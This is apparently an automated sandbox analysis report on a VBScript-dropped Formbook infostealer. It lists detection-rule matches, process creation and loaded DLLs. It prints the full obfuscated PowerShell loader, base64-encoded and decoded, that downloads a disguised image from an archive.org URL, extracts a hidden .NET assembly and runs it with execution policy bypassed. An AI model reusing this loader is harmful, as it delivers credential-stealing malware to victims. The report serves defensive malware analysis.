              Source: 5.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000B.00000002.3411918505.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000005.00000002.2744370490.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000C.00000002.3413713122.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000B.00000002.3409933313.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000005.00000002.2743702515.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 6568, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1492, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBE@12/6@7/5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:380:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g0mfx1ro.0w2.ps1Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: dllhost.exe, 0000000B.00000003.2923701892.000000000341B000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3410035281.0000000003411000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2921298085.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2921298085.0000000003411000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3410035281.000000000343D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: 10092024150836 09.10.2024.vbeVirustotal: Detection: 7%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10092024150836 09.10.2024.vbe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe"
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeProcess created: C:\Windows\SysWOW64\dllhost.exe "C:\Windows\SysWOW64\dllhost.exe"
              Source: C:\Windows\SysWOW64\dllhost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe"Jump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeProcess created: C:\Windows\SysWOW64\dllhost.exe "C:\Windows\SysWOW64\dllhost.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: wkscli.dllJump to behavior
